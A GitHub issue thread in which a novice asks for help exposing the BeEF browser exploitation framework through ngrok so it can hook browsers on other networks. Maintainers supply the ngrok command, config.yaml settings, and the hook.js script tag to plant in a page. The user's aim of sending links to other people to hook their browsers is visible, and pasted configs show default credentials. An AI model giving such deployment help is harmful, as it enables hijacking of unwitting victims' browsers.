Closed sawce7 closed 6 years ago
Also have read https://github.com/beefproject/beef/issues/1619 and basically every other BeEF and ngrof thread.
Also apt-get update && apt-get upgrade did not work either.
And I am still completely lost. Some help would be greatly appreciated. -Thank you
This is my config.yaml file for beef-xss right now, what should I be replacing with my public IP etc.
#
#
beef: version: '0.4.7.0-alpha'
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "beef"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
#public: "" # public hostname/IP address
#public_port: "" # public port (experimental)
# Web Admin user interface URI
web_ui_basepath: "/ui"
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
# For information on using other databases please read the
# README.databases file
# supported DBs: sqlite, mysql, postgres
# NOTE: you must change the Gemfile adding a gem require line like:
# gem "dm-postgres-adapter"
# or
# gem "dm-mysql-adapter"
# if you want to switch drivers from sqlite to postgres (or mysql).
# Finally, run a 'bundle install' command and start BeEF.
driver: "sqlite"
# db_file is only used for sqlite
db_file: "beef.db"
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 3306
db_name: "beef"
db_user: "beef"
db_passwd: "beef"
db_encoding: "UTF-8"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database:
# curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
# gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
enable: false
database: '/opt/GeoIP/GeoLiteCity.dat'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
enable: true
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true
"Unable to connect" is not something that BeEF says.
Your issue is with your network configuration or ngrok configuration.
A few other users have used ngrok and managed to get it working. You might find some useful information in one of the issues:
"Unable to connect" is not something that BeEF says.
Your issue is with your network configuration or ngrok configuration.
A few other users have used ngrok and managed to get it working. You might find some useful information in one of the issues:
I've already read those threads and I still have no hope :(. I tried everything in thos ethreads and it still wont hook with ngrok.
Completely reinstalled Kali Linux and starting fresh nothing touched other then ngrok downloaded. Can someone please give me a rundown on how I get beef to work with ngrok. I cannot port forward using my router because its leased. Thank you
No need to port forward.
Simply run ngrok:
$ ngrok http 3000
Then set the public facing host and port in config.yaml
:
public: "<your-id>.ngrok.io" # public hostname/IP address
public_port: "80" # public port (experimental)
No need to port forward.
Simply run ngrok:
$ ngrok http 3000
Then set the public facing host and port in
config.yaml
:public: "<your-rd>.ngrok.io" # public hostname/IP address public_port: "80" # public port (experimental)
So for the "public": that should the be http: link i get out of ngrok correct.
So for the "public": that should the be http: link i get out of ngrok correct.
yes
So for the "public": that should the be http: link i get out of ngrok correct.
yes
Ok, after doing that. I had my friend open the link and it would not load for him and it said "site could not be reached." Any ideas?
"Site could not be reached" is rather vague. What does that mean exactly?
Why not try opening the link yourself?
This site can’t be reached 78405525.ngrok.io took too long to respond. Search Google for 78405525 ngrok 3000 demos butcher index ERR_CONNECTION_TIMED_OUT
http://78405525.ngrok.io/
So after using ngrok, when i open the advanced link to the meat site. 12.0.0.1:3000/demos/butcher/index.html, if i would want to send this to someover on another wifi I should replace the 127.0.0.1 with the http link from ngrok http 3000 correct?
You know how when you start ngrok it gives you three URLs?
One is for the web interface. Ignore it. There's two others. One is HTTP, the other is HTTPS. Open the HTTP link.
I opened it and it bring me to an Apache 2 Test Page, sorry for asking so much I am a noob haha! I have just been struggling with this for so long now and I have tried so many threads and re started so many times.
That means it's working. Congratulations.
So if I would want to retrieve a hook on beef, how would I do so?
If the Demos extension is enabled, you can load the demo page at /demos/basic.html
I dont think it is enable, Its saying its not a directory. Do I enable this through the config.yaml from beef-xss?
glhf
It is enabled, how would I go along sending a link to a user and receiving a hook?
It now loads on another wifi but not it says hook.js has a 500 Internal Server Error in ngrok.
It is enabled, how would I go along sending a link to a user and receiving a hook?
When BeEF starts, it prints the hook URL to console:
[14:07:32] | Hook URL: http://beef.ngrok.io:80/hook.js
[14:07:32] |_ UI URL: http://beef.ngrok.io:80/ui/panel
The Hook URL
is the URL to hook a browser. To hook a browser, you will need the browser to execute the hook. This can be achieved by making use of the <script>
HTML tag. The following HTML can be used to make a browser execute the hook JavaScript code:
<script src="http://beef.ngrok.io:80/hook.js"></script>
If a browser navigates to a page containing the above HTML, the browser load and execute the hook JavaScript.
Ok, So I should be replacing the current hook url too
It now loads on another wifi but not it says hook.js has a 500 Internal Server Error in ngrok.
Make sure your BeEF is up to date.
If you still receive the HTTP 500 error, and you're using BeEF from an operating system package, such as the beef-xss
package on Kali, then you'll need to refer your issue to the package maintainers.
Alternatively, you can try downloading BeEF from GitHub:
git clone https://github.com/beefproject/beef
cd beef
./install
Ok thank you, one more question. If I would want to replace the current hook url, I would use the apache2 index.html right?
i dont know what that means
i dont know what that means
Where do I need to go to locate and change the hook url and ui url.
https://github.com/beefproject/beef/wiki/Configuration
In config.yaml
:
web_ui_basepath: "/ui" # Path for admin UI
hook_file: "/hook.js" # Path for hooking script
web_ui basepath: "http://beef.ngrok.io:80/ui/panel"
hook_file: "/hook.js" hook_session_name: "BEEFHOOK: session_cookie_name: "BEEFSESSION"
no
Sorry I am confused on the script part because various websites are giving me completely different information.
Do not use beef.ngrok.io
- use your actual ngrok host name.
Do not use a full URL in web_ui_basepath
. Use a path, like /path/to/panel
The BeEF hook file is JavaScript code. It's dynamically generated at run time and hosted on the BeEF web server.
To hook a browser, you will need the browser to execute the hook code. This can be achieved by making use of the <script>
HTML tag. The following HTML can be used to make a browser execute the hook JavaScript code:
<script src="http://beef.ngrok.io:80/hook.js"></script>
If a browser navigates to a page containing the above HTML, the browser load and execute the hook JavaScript.
You can host that HTML code anywhere you like, so long as it's served with an executable Content-Type
header, such as Content-Type: text/html
Hook URL:
and I should implement this into index.html
You'll need the URL scheme http://
.
You can host it wherever you like.
Ok, where is the most ideal place to host it?
Stored XSS on google.com
Implemented the hook url script into demo page, loads up the butcher page on another wifi but still getting the hook.js 500 internal server error.
The link I tested on another wifi and copied into a browser was: http://3783cj83.ngrok.io/demos/butcher/index.html
Make sure your BeEF is up to date.
If you still receive the HTTP 500 error, and you're using BeEF from an operating system package, such as the beef-xss
package on Kali, then you'll need to refer your issue to the package maintainers.
Alternatively, you can try downloading BeEF from GitHub:
git clone https://github.com/beefproject/beef
cd beef
./install
I cloned it, this time ngrok says "hook.js 200 OK" but there is nothing new in my UI????
Was a new hooked browser reported in the console?
Did you configure the config.yaml
file in the new clone?
It was the same configurations after I cloned it.
Can I email you my config? Or PM you.
Or am I good to just post it on here.
Try eliminating ngrok from the equation. Make sure BeEF is working locally first.
#
#
beef: version: '0.4.7.0-alpha'
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT
# set the public hostname and port here
#public: "ngork host name" # public hostname/IP address
#public_port: "80" # experimental
# DNS
dns_host: "my public ip"
dns_port: 53
# Web Admin user interface URI
web_ui_basepath: "/ui"
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
# For information on using other databases please read the
# README.databases file
# supported DBs: sqlite, mysql, postgres
# NOTE: you must change the Gemfile adding a gem require line like:
# gem "dm-postgres-adapter"
# or
# gem "dm-mysql-adapter"
# if you want to switch drivers from sqlite to postgres (or mysql).
# Finally, run a 'bundle install' command and start BeEF.
driver: "sqlite"
# db_file is only used for sqlite
db_file: "db/beef.db"
# db connection information is only used for mysql/postgres
db_host: "my public ip"
db_port: 3306
db_name: "beef"
db_user: "beef"
db_passwd: "beef"
db_encoding: "UTF-8"
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin_UI extension
credentials:
user: "beef"
passwd: "beef"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database:
# curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
# gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
enable: false
database: '/opt/GeoIP/GeoLiteCity.dat'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
extension:
requester:
enable: true
proxy:
enable: true
key: "beef_key.pem"
cert: "beef_cert.pem"
metasploit:
enable: false
social_engineering:
enable: true
evasion:
enable: false
console:
shell:
enable: false
ipec:
enable: true
# this is still experimental..
# Disable it in kali because it doesn't work with the current
# version of ruby-rubydns (older version is required by beef-xss)
dns:
enable: false
# this is still experimental..
dns_rebinding:
enable: false
Anything I need to change here? My public IP is actually there on my side and same goes for the public.
Verify first that your issue/request has not been posted previously:
Ensure you're using the latest version of BeEF.
Environment
What version/revision of BeEF are you using? (0.4.7.0-0kali4). On what version of Ruby? Not sure what Ruby is used for. But before I had ngrof, BeEF would open. On what browser? Firefox On what operating system? Kali Linux 64bit
Configuration
Are you using a non-default configuration? Yes, Just changed "dns_host" and "db_host" in the "/usr/share/beef-xss# leafpad config.yaml" to my public IP. For the "cd extensions/metasploit/config.yaml I changed "host" and "callback_host" to my public IP. I also changed:
HTTP server
http: debug: false #Thin: :Logging.debug, very verbose. Prints Also full exception stack trace. host: "0.0.0.0" port: "80"
I changed the default port above to "80" instead of "3000" because I am using ngrof and If I kept it at 3000, I wouldn't get a hook back from BeEF. I followed these:
https://github.com/beefproject/beef/issues/1489 https://null-byte.wonderhowto.com/how-to/beef-browser-exploitation-framework-project-over-wan-0168022/
Have you enabled or disabled any BeEF extensions? No
Summary
Please provide a summary of the issue. BeEF says its "Unable to connect" after launching it. Also, I cant receive hooks while using ngrof. Literally read every article on this and I cant figure it out. Please help me, I've been researching this problem all day.
Expected Behaviour
What was the expected result? To be able to receive hooks using ngrof and BeEF.
Actual Behavior
What was the actual result? BeEF not being able to load and not recieving hooks.
Steps to Reproduce
Please provide steps to reproduce this issue. N/A
Additional Information
Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots.
https://gyazo.com/d39c19b0ccc3794a1c42e885c10cc7cc